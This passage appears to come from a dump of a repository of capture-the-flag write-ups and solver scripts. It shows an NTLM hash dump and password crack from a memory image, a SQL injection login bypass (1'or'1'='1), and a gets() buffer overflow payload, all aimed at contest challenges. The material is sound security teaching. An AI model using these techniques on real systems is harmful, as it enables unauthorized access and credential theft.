problem?\n\n[ac1750-452ca8a9038502712d30c628d3444e5a22894611f1286b7a818203bdf838b434.tar.gz](https://hitcon-2020-quals.s3-ap-northeast-1.amazonaws.com/ac1750-452ca8a9038502712d30c628d3444e5a22894611f1286b7a818203bdf838b434.tar.gz)\n\nAuthor: Jeffxx" }, { "alpha_fraction": 0.4329896867275238, "alphanum_fraction": 0.45618557929992676, "avg_line_length": 18.450000762939453, "blob_id": "27a6bacfdf207b245d2a852553e6df5c366d7001", "content_id": "9551228195907e6924d406e01ca4363e230a3601", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 922, "license_type": "no_license", "max_line_length": 85, "num_lines": 33, "path": "/2020/Harekaze_mini_CTF_2020/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Harekaze mini CTF 2020\n\n* https://ctf.harekaze.com/\n\n* 2020/12/26 10:00 JST — 2020/12/27 10:00 JST\n\n>@TeamHarekaze\n>We have published a repository that includes the source code, solvers, and more.\n>We have published challenge files, including source codes and solvers, on GitHub.\n>https://github.com/TeamHarekaze/harekaze-mini-ctf-2020-challenges-public\n>#HarekazeCTF\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --- | ------------------------------------------- | ------------ | ----: | -----: |\n| Web | [What time is it now?](What_time_is_it_now) | date command | 123 | 63 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| ------ | ---------- | ------------------- | ----: | -----: |\n| Crypto | [rsa](rsa) | RSA encrypt p and q | 186 | 25 |\n\n---\n\n## Result\n\n* 214 points\n\n* 82 / 134 (> 1 pt)" }, { "alpha_fraction": 0.5645090341567993, "alphanum_fraction": 0.8260678052902222, "avg_line_length": 46.33333206176758, "blob_id": "86a2fcc01fd44b99138ef2460affb49b9c4f0f32", "content_id": "4cc1298a50e3c97494ecfb377cf175e840652511", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 2465, "license_type": "no_license", "max_line_length": 108, "num_lines": 48, "path": "/2020/WaniCTF/ALLIGATOR_03/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nThe zip file is password-protected, so we use `Volatility` to look for a password the user habitually uses.\n\n[Reference]\n\n* https://www.aldeid.com/wiki/Volatility/Retrieve-password\n\n```bash\n$ vol.py -f ALLIGATOR.raw --kdbg=0x82754de8 --profile=Win7SP1x86_23418 hivelist\nVolatility Foundation Volatility Framework 2.6.1\nVirtual Physical Name\n---------- ---------- ----\n0x96833008 0x29f35008 \\??\\C:\\System Volume Information\\Syscache.hve\n0x9a37a008 0x0edcf008 \\??\\C:\\Users\\ALLIGATOR\\ntuser.dat\n0x9a37c008 0x0eed1008 \\??\\C:\\Users\\ALLIGATOR\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat\n0x8780a6b8 0x282fb6b8 [no name]\n0x8781a008 0x28349008 \\REGISTRY\\MACHINE\\SYSTEM\n0x87838218 0x28367218 \\REGISTRY\\MACHINE\\HARDWARE\n0x8b0599c8 0x248859c8 \\??\\C:\\Windows\\ServiceProfiles\\LocalService\\NTUSER.DAT\n0x8cb07008 0x26f46008 \\Device\\HarddiskVolume1\\Boot\\BCD\n0x8e7f7008 0x26313008 \\SystemRoot\\System32\\Config\\SOFTWARE\n0x904655f8 0x225685f8 \\??\\C:\\Users\\IEUser\\ntuser.dat\n0x9144b5c0 0x260205c0 \\SystemRoot\\System32\\Config\\DEFAULT\n0x937338d0 0x250778d0 \\SystemRoot\\System32\\Config\\SECURITY\n0x93791458 0x1d940458 \\SystemRoot\\System32\\Config\\SAM\n0x937b79c8 0x248899c8 \\??\\C:\\Users\\IEUser\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat\n0x937fb758 0x248dd758 \\??\\C:\\Windows\\ServiceProfiles\\NetworkService\\NTUSER.DAT\n0x96449458 0x03f4f458 
\\??\\C:\\Users\\sshd_server\\ntuser.dat\n0x9645d3d8 0x2830b3d8 \\??\\C:\\Users\\sshd_server\\AppData\\Local\\Microsoft\\Windows\\UsrClass.dat\n```\n\n```bash\n$ vol.py -f ALLIGATOR.raw --kdbg=0x82754de8 --profile=Win7SP1x86_23418 hashdump -y 0x8781a008 -s 0x93791458\nVolatility Foundation Volatility Framework 2.6.1\nAdministrator:500:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::\nGuest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nIEUser:1000:aad3b435b51404eeaad3b435b51404ee:fc525c9683e8fe067095ba2ddc971889:::\nsshd:1001:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::\nsshd_server:1002:aad3b435b51404eeaad3b435b51404ee:8d0a16cfc061c3359db455d00ec27035:::\nALLIGATOR:1003:aad3b435b51404eeaad3b435b51404ee:5e7a211fee4f7249f9db23e4a07d7590:::\n```\n\nUsing [crackstation](https://crackstation.net/), we find that `5e7a211fee4f7249f9db23e4a07d7590` is `ilovewani`.
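\n\nSince these are NT hashes, the match can be double-checked locally — NTLM is MD4 over the UTF-16LE password (this assumes an OpenSSL build that still exposes legacy MD4 to `hashlib`):\n\n```py\nimport hashlib\n\nh = hashlib.new('md4', 'ilovewani'.encode('utf-16le')).hexdigest()\nprint(h)  # 5e7a211fee4f7249f9db23e4a07d7590\n```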
But, when they got it back the PC caught fire because of a defense mechanism set up by the two hackers.\n\nThe hard drive could not be saved, but they had time to put the RAM in liquid nitrogen and analyze it later.\n\nYou know what you have to do!\n\nFor this first step, find the name of the PC!\n\nDownload, [here](http://chall0.heroctf.fr/Challenge.zip).\n\nAuthor: Worty\nFormat: Hero{Name}\n" }, { "alpha_fraction": 0.620853066444397, "alphanum_fraction": 0.7203791737556458, "avg_line_length": 22.44444465637207, "blob_id": "d108f2c10bd42749399eaeddbaf3cd241bd7b59f", "content_id": "b14c7028a5cf5fb5b38d1110b8980bd43db330b0", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 287, "license_type": "no_license", "max_line_length": 92, "num_lines": 9, "path": "/2021/ImaginaryCTF_2021/Roos_World/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n[http://roos-world.chal.imaginaryctf.org](http://roos-world.chal.imaginaryctf.org/) にアクセスする。\n\n開発者ツールでコンソールを見たところフラグが出力されていた。\n\n![](img/2021-07-24-18-49-39.png)\n\n<!-- ictf{1nsp3ct0r_r00_g0es_th0nk} -->\n" }, { "alpha_fraction": 0.5300353169441223, "alphanum_fraction": 0.7243816256523132, "avg_line_length": 50.54545593261719, "blob_id": "afd987571f9deb2aa50421860e9812fc6692fd29", "content_id": "738672fc7f65211ac755dbede4b87aadd8c1287f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 566, "license_type": "no_license", "max_line_length": 291, "num_lines": 11, "path": "/2020/kksctf_open_2020/bson/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import bson\nfrom bson.codec_options import CodecOptions\n\ncodec_options = CodecOptions(unicode_decode_error_handler='ignore')\ns = b'\\x45\\x00\\x00\\x00\\x0b'+b'\\x82\\xa3\\x6b\\x65\\x79\\x5c\\xa4\\x66\\x6c\\x61\\x67\\xdc\\x00\\x31\\x37\\x37\\x2f\\x27\\x36\\x2f\\x6c\\x32\\x03\\x35\\x2f\\x03\\x3f\\x6c\\x6c\\x30\\x03\\x3e\\x29\\x28\\x03\\x34\\x3d\\x2a\\x6f\\x03\\x25\\x33\\x29\\x03\\x28\\x2e\\x35\\x39\\x38\\x03\\x31\\x6f\\x2f\\x2f\\x1c\\x3b\\x39\\x03\\x2c\\x3d\\x3f\\x37\\x21'+b'\\x00'\nbson_obj = bson.decode_iter(s,codec_options=codec_options)\nfor item in bson_obj:\n try:\n print(item)\n except Exception as e:\n pass" }, { "alpha_fraction": 0.670918345451355, "alphanum_fraction": 0.8010203838348389, "avg_line_length": 77.5999984741211, "blob_id": "ab4c322edb5c8c4f9958448ca082afd85a4a6e30", "content_id": "17a792adcc8a1ebf7ba741a3809e3064f79b9ccf", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 392, "license_type": "no_license", "max_line_length": 270, "num_lines": 5, "path": "/2021/angstromCTF_2021/FREE_FLAGS!!1!!/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Clam was browsing armstrongctf.com when suddenly a popup appeared saying \"GET YOUR FREE FLAGS HERE!!!\" along with [a download](https://files.actf.co/6ddcb4e935b82c477140ee6833eceaf1149e0c732af1ba742a9e67db98693f88/free_flags). 
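The bson solver above grafts a 4-byte little-endian length prefix onto raw bytes and walks them with a lenient codec. A round-trip sketch of the same API, assuming the `bson` module that ships with pymongo (the one the solver imports):

```python
# Encode a document, then decode it back with the same lenient CodecOptions
# the solver uses; the first four bytes are the total-length prefix, like the
# \x45\x00\x00\x00 the solver prepends by hand.
import bson
from bson.codec_options import CodecOptions

raw = bson.encode({"key": "demo", "value": 1})
print(raw[:4])  # little-endian int32 length of the whole document

opts = CodecOptions(unicode_decode_error_handler="ignore")
for doc in bson.decode_iter(raw, codec_options=opts):
    print(doc)
```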
Can you fill out the survey for free flags?\n\nFind it on the shell server at `/problems/2021/free_flags` or over netcat at `nc shell.actf.co 21703`.\n\nAuthor: aplet123" }, { "alpha_fraction": 0.6601307392120361, "alphanum_fraction": 0.8169934749603271, "avg_line_length": 50, "blob_id": "8416fe0944d7c362584a157c9ae11b8143bd18b0", "content_id": "c85619bb82e35fad967f2e138f2486b0bbe0431f", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 153, "license_type": "no_license", "max_line_length": 101, "num_lines": 3, "path": "/2021/dCTF_2021/Dont_let_it_run/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "PDF documents can contain unusual objects within.\n\n[dragon.pdf](https://dctf.dragonsec.si/files/07647a7658310091dd1e0856ab3a725e/dragon.pdf?token=eyJ1c2VyX2lkIjo4OTQsInRlYW1faWQiOjM2NiwiZmlsZV9pZCI6MTUzfQ.YJ9LWw.n7iel59uw0jjClT3418izqzfQ7I)\n" }, { "alpha_fraction": 0.8678303956985474, "alphanum_fraction": 0.8678303956985474, "avg_line_length": 22.647058486938477, "blob_id": "944d66e351f46d50cf60dd63b5820509abb10974", "content_id": "8f01722d98c3edbefa6cb9a4644a4b859bc665e3", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 999, "license_type": "no_license", "max_line_length": 94, "num_lines": 17, "path": "/2020/WaniCTF/MQTT_Challenge/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "問題ページ: https://mqtt.wanictf.org\n\n噂の軽量プロトコル「MQTT」をテストするページを作ったよ。どこかに秘密のトピックがあるから探してみてね。\n\n(Hint)\n\n今回の問題ページではあらかじめ「nkt/test」というトピックをサブスクライブしており、他にも「nkt/hoge」「nkt/huga」などのトピックに対してパブリッシュが行われています。\n\n別のトピックを入力して「Subscribe」ボタンを押すとそのトピックをサブスクライブできるので、どうにかしてFLAGを配信しているトピックを見つけてください。\n\n(注意)\n\nデータが送信されてくる間隔は約一分程度になっているので、新たにトピックをサブスクライブした際などは少し様子を見てみてください。\n\nまれにコネクションが切れる場合があるので、様子がおかしいときはリロードしてください。\n\nWriter : nkt" }, { "alpha_fraction": 0.5741758346557617, "alphanum_fraction": 0.5906593203544617, "avg_line_length": 25.071428298950195, "blob_id": "c768cfb4baef0cd298feb3a87962a33b6957208f", "content_id": "28b9ea044290b0e0c8bf8a4c880875143e9fff85", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 364, "license_type": "no_license", "max_line_length": 52, "num_lines": 14, "path": "/2020/pbctf_2020/Ainissesthai/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from string import ascii_uppercase as UC\n\ncipherlist = []\nwith open('./output.txt') as f:\n while True:\n cipher = f.readline()\n if len(cipher) < 1:\n break\n cipherlist.append(cipher[0:-1]) # exclude \\n\n\nfor i in range(17):\n string = [char[i] for char in cipherlist]\n diff = set(UC)-set(string)\n print(list(diff)[0],end='')" }, { "alpha_fraction": 0.3173241913318634, "alphanum_fraction": 0.3893653452396393, "avg_line_length": 19.13793182373047, "blob_id": "9c81998b3a55a7fdb588940d62855e548aca4cbc", "content_id": "3d43b2bef77f7f282266cedd0eafae1233cc0b83", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 585, "license_type": "no_license", "max_line_length": 71, "num_lines": 29, "path": "/2020/KipodAfterFreeCTF/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# KipodAfterFree CTF\n\n* https://ctf.kaf.sh/\n\n* 2020/11/07 02:00 JST — 2020/11/09 02:00 JST\n\n---\n\n## My Challenges\n\n### Solved\n\n| tag | problem | comment | score | solved |\n| --------- | 
---------------------------- | ------- | ----: | -----: |\n| Reversing | [SSE_KEYGENME](SSE_KEYGENME) | angr | 25 | 127 |\n\n### Unsolved\n\n| tag | problem | comment | score | solved |\n| --------- | -------------- | ------- | ----: | -----: |\n| Reversing | [8byte](8byte) | | | 39 |\n\n---\n\n## Result\n\n* 30 points\n\n* 109 / 624 (> 1 pts)" }, { "alpha_fraction": 0.7407407164573669, "alphanum_fraction": 0.8024691343307495, "avg_line_length": 39.5, "blob_id": "6cd8ac8c2bf6a2528ec4751315393ade3c61be0b", "content_id": "2d64f49827754e0a4ada86b0e476d19167cb00d7", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 81, "license_type": "no_license", "max_line_length": 63, "num_lines": 2, "path": "/2021/dCTF_2021/Simple_web/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Time to warm up!\nhttp://dctf1-chall-simple-web.westeurope.azurecontainer.io:8080\n" }, { "alpha_fraction": 0.46355685591697693, "alphanum_fraction": 0.6180757880210876, "avg_line_length": 17.105262756347656, "blob_id": "7f34ee5a3baa2a79a77d66a13126c1e124ae0575", "content_id": "c28b0a84685b6f317007a886a6b36662ba53859a", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 343, "license_type": "no_license", "max_line_length": 43, "num_lines": 19, "path": "/2021/DawgCTF_2021/TrashChain/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nA = 340282366920938460843936948965011886881\nio = remote(\"umbccd.io\",\"3100\")\n\ndef send_chain(num:[int]):\n for n in num:\n io.recvuntil('>')\n io.sendline(str(n))\n io.sendline('done')\n\n# chain 1\nsend_chain([A])\n\n# chain 2\nsend_chain([A*2, A*3-1, A*4-2, A*5-3])\n\nprint(io.recvall().decode('utf-8'))\nio.close()" }, { "alpha_fraction": 0.6354166865348816, "alphanum_fraction": 0.7847222089767456, "avg_line_length": 40.14285659790039, "blob_id": "8bca3595dbe78a83dbac46df0e0e8c28f0c5ed74", "content_id": "e0e1ba6ea747aaaaaeeaa87ea9dc3a2e7322c32e", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 288, "license_type": "no_license", "max_line_length": 103, "num_lines": 7, "path": "/2021/UIUCTF_2021/dhke_intro/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "Small numbers are bad in cryptography. This is why.\n\n**author**: whimsicott79@leftovers\n\n[dhkectf_intro.py](https://uiuc.tf/files/526ea49d71ad9da2203af841e4585dbc/dhkectf_intro.py?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjE5fQ.YQTuXw.y3Lx-PgV1rDXYMKndPWXJ0fJQTg)\n\n[output.txt](https://uiuc.tf/files/3c2fb5638b9110a809dbbf0093a74671/output.txt?token=eyJ1c2VyX2lkIjoxMjMwLCJ0ZWFtX2lkIjo2MjMsImZpbGVfaWQiOjIwfQ.YQTuXw.L0UCESpk3hkUbap6k3NyWzBk3Tw)\n" }, { "alpha_fraction": 0.7455357313156128, "alphanum_fraction": 0.7633928656578064, "avg_line_length": 74, "blob_id": "e2dc2a329002a3dd12f9ba01ad62cda343095a1d", "content_id": "7b6e6d4ce8776bf33f35a2fae3a1088917340df9", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 224, "license_type": "no_license", "max_line_length": 161, "num_lines": 3, "path": "/2021/BCACTF_2.0/Easy_RSA/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "As part of his CTF101 class, Gerald needs to find the plaintext that his teacher encrypted. Can you help him do his homework? 
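The Ainissesthai solver a few records up leans on a classic Enigma flaw: the machine never maps a letter to itself, so across enough encryptions of the same plaintext, the one letter missing from each ciphertext column is the plaintext letter. A toy illustration with a hypothetical observed column:

```python
# Column-wise elimination: if 'J' never appears at this position across many
# ciphertexts, 'J' must be the plaintext letter there.
from string import ascii_uppercase as UC

column = [c for c in UC if c != 'J']   # synthetic column of observed letters
candidates = set(UC) - set(column)
print(candidates)                      # {'J'}
```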
( It's definetely not cheating ;) )\n\n[enc.txt](https://objects.bcactf.com/bcactf2/easyRSA/enc.txt)" }, { "alpha_fraction": 0.7126865386962891, "alphanum_fraction": 0.7350746393203735, "avg_line_length": 23.272727966308594, "blob_id": "c6cd003c98c8f46cdb3b91fe75718dbf08998647", "content_id": "1ee6d77cb406e2d360089f4f85b49dbc29c11294", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 268, "license_type": "no_license", "max_line_length": 90, "num_lines": 11, "path": "/2021/BCACTF_2.0/More_than_Meets_the_Eye/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "My friend just sent me this file, but it looks pretty empty. Are you able to see anything?\n\n[zwsp.txt](https://objects.bcactf.com/bcactf2/zwsp/zwsp.txt?v=3)\n\nHint 1 of 2\n\nFile names aren't random. What does zwsp mean?\n\nHint 2 of 2\n\nHow do you convert binary to text?\n\n" }, { "alpha_fraction": 0.6198225021362305, "alphanum_fraction": 0.6538461446762085, "avg_line_length": 17.77777862548828, "blob_id": "4d6abcc43c550591d2f2a15c2151a8e147b75e3a", "content_id": "128eb022d4133606afaf5ca310656f3fa8158036", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 676, "license_type": "no_license", "max_line_length": 53, "num_lines": 36, "path": "/2021/WaniCTF21-spring/OUCS/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "from pwn import *\n\nio = remote('oucs.cry.wanictf.org','50010')\n\nplaintext = \"\"\nciphertext = \"\"\nn = 0\n\n# Get n\nio.recvuntil('> ')\nio.sendline('4')\nexec(io.recvline().decode('utf-8')) # n\n\n# Get c1\nio.recvuntil('> ')\nio.sendline('1')\nexec(io.recvline().decode('utf-8'))\nflag_encrypt = ciphertext\n\n# Get c2\nio.recvuntil('> ')\nio.sendline('2')\nio.recvuntil('> ')\nio.sendline('0x01')\nexec(io.recvline().decode('utf-8'))\none_encrypt = ciphertext\n\n# decrypt c1*c2 mod n\nio.recvuntil('> ')\nio.sendline('3')\nio.recvuntil('> ')\nio.sendline(str(hex((flag_encrypt * one_encrypt)%n)))\nexec(io.recvline().decode('utf-8'))\n\nplaintext = hex(plaintext - 1)\nprint(bytes.fromhex(plaintext[2:]))\n" }, { "alpha_fraction": 0.7755101919174194, "alphanum_fraction": 0.8095238208770752, "avg_line_length": 23.66666603088379, "blob_id": "717a893c95fffdb1c6e53dd80beb2eb4857d27ca", "content_id": "b5cc37642a3322ae8dda30b6339ab89151643193", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 173, "license_type": "no_license", "max_line_length": 89, "num_lines": 6, "path": "/2020/WaniCTF/LCG_crack/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "安全な暗号は安全な乱数から\n`nc lcg.wanictf.org 50001`\n\n[server.py](https://score.wanictf.org/storage/mpwxompyfpmkjnthpqnyjybcztaigekz/server.py)\n\nWriter : Laika" }, { "alpha_fraction": 0.543749988079071, "alphanum_fraction": 0.574999988079071, "avg_line_length": 21.85714340209961, "blob_id": "af2913d62b37434b0bd56f6dd4c9d67e009a9d59", "content_id": "ec3957abc8cff4111bce9683ec2cfa2ef417e392", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 160, "license_type": "no_license", "max_line_length": 57, "num_lines": 7, "path": "/2021/angstromCTF_2021/Relatively_Simple_Algorithm/solver.py", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "import os\n\nexec(open(os.path.dirname(__file__) + \"/rsa.txt\").read())\n\nd = pow(e,-1,(p-1)*(q-1))\nm 
= pow(c,d,n)\nprint(bytes.fromhex(hex(m)[2:]).decode('utf-8'))\n" }, { "alpha_fraction": 0.8626943230628967, "alphanum_fraction": 0.8704662919044495, "avg_line_length": 16.545454025268555, "blob_id": "2d544f26456be519ad9503a57fd23172654d3e2a", "content_id": "fdc2e5530b8293d6f6026b6aa7344b3260c3e968", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 920, "license_type": "no_license", "max_line_length": 46, "num_lines": 22, "path": "/2021/WaniCTF21-spring/Wani_Request_1/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "RequestBinを使ってみよう!!\n\nhttps://request1.web.wanictf.org/\n\nこの問題ではあどみんちゃんから自分のサーバにアクセスしてもらう必要があります。\n\n自前でサーバを用意するのが難しい方はRequestBinなどのサービスを利用してみましょう。\n\nサーバが用意出来たらいよいよ本番です。\n\n問題ページにアクセスし、あなたが用意したサーバのURLを送信してください。\n\n送信するとあどみんちゃんの秘密のページにあなたの送信したURLのリンクが表示されます。\n\nあどみんちゃんは表示されたリンクをクリックしてあなたのサーバにアクセスしてくれます。\n\nあどみんちゃんからのアクセスを分析して秘密のページを探してみてください。\n\nHINT1 : HTTP ヘッダー\nHINT2 : xss問題ではありません。\n\nWriter : nkt\n" }, { "alpha_fraction": 0.5392156839370728, "alphanum_fraction": 0.6813725233078003, "avg_line_length": 21.66666603088379, "blob_id": "3d9695de8fd23a7c05b9dcb4c25ac40494d858f4", "content_id": "bd11f4b196858d051791fb383c4d1fc339148278", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 292, "license_type": "no_license", "max_line_length": 64, "num_lines": 9, "path": "/2021/BCACTF_2.0/Movie-Login-1/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\nhttp://web.bcactf.com:49160/ にアクセスするとログイン画面が表示される。\n\n![](img/2021-06-13-13-38-51.png)\n\n`username = admin, password = 1'or'1'='1`にしたところログインでき、フラグが表示された。\n\n<!-- bcactf{s0_y0u_f04nd_th3_fl13r?} -->\n" }, { "alpha_fraction": 0.2801484167575836, "alphanum_fraction": 0.7476809024810791, "avg_line_length": 14.428571701049805, "blob_id": "782770c59aaef544ce9b5d8069df0095b616d7b9", "content_id": "6baf6184e08272ddd4375e27ffdaa1250b9c0182", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 805, "license_type": "no_license", "max_line_length": 61, "num_lines": 35, "path": "/2020/kksctf_open_2020/fonction_speciale/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n```\nf(2522521337)=1215221512112317\nf(1215221512112317)=1112111522111511122112131117\nf(1112111522111511122112131117)=31123115223115312221121113317\n```\n\n上記の関数の法則を探る。8未満の数字しかないので8進数?と考えたが、違うっぽい。\n\n末尾が全部7が気になり、出力は末尾が17になっていることに気づいた。\n\n直感的に、X個の数字Yの並びをXYと書く方式を当てはめてみたら上手くいくことが分かった。\n\n```\n例)\n\nf(112223) = 213213\n\n2個の1, 3個の2, 1個の3 = 21 32 13\n```\n\n\n```\nf(2229555555768432252223133777492611)=x\n```\n\nよって`x`は`321965...`となる。\n\n\n<!-- ( 1着狙ったが4位だった :( )\n\n![](img/2020-12-12-18-14-48.png) -->\n\n<!-- kks{3219651716181413221532131123371419121621} -->" }, { "alpha_fraction": 0.791208803653717, "alphanum_fraction": 0.791208803653717, "avg_line_length": 90, "blob_id": "956de3fe0af8a66c37d6130dc84e948ef4d7dbc5", "content_id": "791d5ecad422c4adc487aa2120c6d29c2a0a11b2", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 91, "license_type": "no_license", "max_line_length": 90, "num_lines": 1, "path": "/2021/dCTF_2021/Leak_Spin/README.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "We have confident insider report that one of the flags was leaked online. 
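The fonction_speciale write-up above reverse-engineers f as run-length encoding, count first and digit second. A minimal sketch that reproduces the quoted samples and the requested x, assuming (as in the samples) that no run exceeds nine digits:

```python
# f groups consecutive equal digits and emits "<run length><digit>" pairs;
# itertools.groupby matches every sample pair in the write-up.
from itertools import groupby

def f(s: str) -> str:
    return ''.join(str(len(list(g))) + d for d, g in groupby(s))

print(f('2522521337'))                            # 1215221512112317
print(f('2229555555768432252223133777492611'))   # the x the quiz asks for
```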
Can you find it?\n" }, { "alpha_fraction": 0.6433988809585571, "alphanum_fraction": 0.6642934679985046, "avg_line_length": 34.69613265991211, "blob_id": "c637e394cc57367bf6b5955c31566a05a33b9814", "content_id": "05fe4968c36075574cc875fed39913b87810957c", "detected_licenses": [], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 6888, "license_type": "no_license", "max_line_length": 99, "num_lines": 181, "path": "/2021/BCACTF_2.0/Honors_ABCs/writeup.md", "repo_name": "security-notes/workspace", "src_encoding": "UTF-8", "text": "# Writeup\n\n以下のプログラムとその実行ファイルが与えられる。\n\n```c\n#include <unistd.h>\n#include <stdio.h>\n#include <stdlib.h>\n\nchar *correct = \"abcdefghijklmnopqrstuvwxyz\";\n\nint main() {\n int grade = 0;\n char response[50];\n\n setbuf(stdout, NULL);\n setbuf(stdin, NULL);\n setbuf(stderr, NULL);\n\n puts(\"Welcome to your first class at BCA: Honors-level ABCs.\");\n puts(\"Because we expect all our students to be perfect, I'm not going to teach you anything.\");\n sleep(2);\n puts(\"Instead, we're going to have a quiz!\");\n puts(\"And, of course, I expect all of you to know the material already.\");\n sleep(2);\n puts(\"\");\n puts(\"╔════════════════════════╗\");\n puts(\"║ THE QUIZ ║\");\n puts(\"║ ║\");\n puts(\"║ 1) Recite the alphabet ║\");\n puts(\"╚════════════════════════╝\");\n puts(\"\");\n printf(\"Answer for 1: \");\n gets(response);\n\n for (int i = 0; i < 26; ++i) {\n if (response[i] == 0)\n break;\n if (response[i] != correct[i])\n break;\n\n grade = i * 4;\n }\n\n if (grade < 60)\n puts(\"An F? I'm sorry, but you clearly need to study harder.\");\n else if (grade < 70)\n puts (\"You didn't fail, but you could do better than a D.\");\n else if (grade < 80)\n puts(\"Not terrible, but a C's nothing to write home about.\");\n else if (grade < 90)\n puts(\"Alright, a B's not bad, I guess.\");\n else if (grade < 100)\n puts(\"Ayyy, nice job on getting an A!\");\n else if (grade == 100) {\n puts(\"Perfect score!\");\n puts(\"You are an model BCA student.\");\n } else {\n puts(\"How did you end up here?\");\n sleep(2);\n puts(\"You must have cheated!\");\n sleep(2);\n puts(\"Let me recite the BCA plagarism policy.\");\n sleep(2);\n\n FILE *fp = fopen(\"flag.txt\", \"r\");\n\n if (fp == NULL) {\n puts(\"Darn, I don't have my student handbook with me.\");\n puts(\"Well, I guess I'll just give you a verbal warning to not cheat again.\");\n puts(\"[If you are seeing this on the remote server, please contact admin].\");\n exit(1);\n }\n\n int c;\n while ((c = getc(fp)) != EOF) {\n putchar(c);\n usleep(20000);\n }\n\n fclose(fp);\n }\n\n puts(\"\");\n puts(\"Alright, class dismissed!\");\n}\n```\n\n`gets`で`response[50]`を超えた入力をし、`grade`変数を書き換えればよい。\n\ngrade変数の入る`$rbp-0x8`のoffsetを調べたところ、72だったので 72+8 の以下80文字を入力したら上手くいった。\n\n```\nAAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA12345678\n```\n\n```\n$ nc bin.bcactf.com 49155\nWelcome to your first class at BCA: Honors-level ABCs.\nBecause we expect all our students to be perfect, I'm not going to teach you anything.\nInstead, we're going to have a quiz!\nAnd, of course, I expect all of you to know the material already.\n\n╔════════════════════════╗\n║ THE QUIZ ║\n║ ║\n║ 1) Recite the alphabet ║\n╚════════════════════════╝\n\nAnswer for 1: AAA%AAsAABAA$AAnAACAA-AA(AADAA;AA)AAEAAaAA0AAFAAbAA1AAGAAcAA2AAHAAdAA3AA12345678\nHow did you end up here?\nYou must have cheated!\nLet me recite the BCA plagarism policy.\n\nCheating and Plagiarism 
Policy\n==============================\n\nTo plagiarize is to steal and use (the ideas or writings of another) as one’s\nown (American Heritage Dictionary, 1973:1001). Legally, plagiarism has been\ndefined as the act of appropriating the literary composition of another, or\nparts or passages of his/her writings, or language of the same, and passing them\noff as the product of one’s own mind (O’Rourke v. RKO Radio Pictures: 483). The\nstudent should note that neither of these definitions includes intention or\nmotivation—it is the act itself which constitutes plagiarism. Ignorance, naiveté\nor sloppiness is no excuse.\n\nConsequences for Plagiarism or Cheating\n---------------------------------------\n1st Offense:\n1. A grade of “0” will be given for the assignment or test\n2. Option to re-do assignment with the grade for the redone assignment averaged\n with the zero for a final average not to exceed 50%.\n3. If a student is caught cheating on a test, the student may retake the test;\n the zero on the first test will be averaged with the score on the 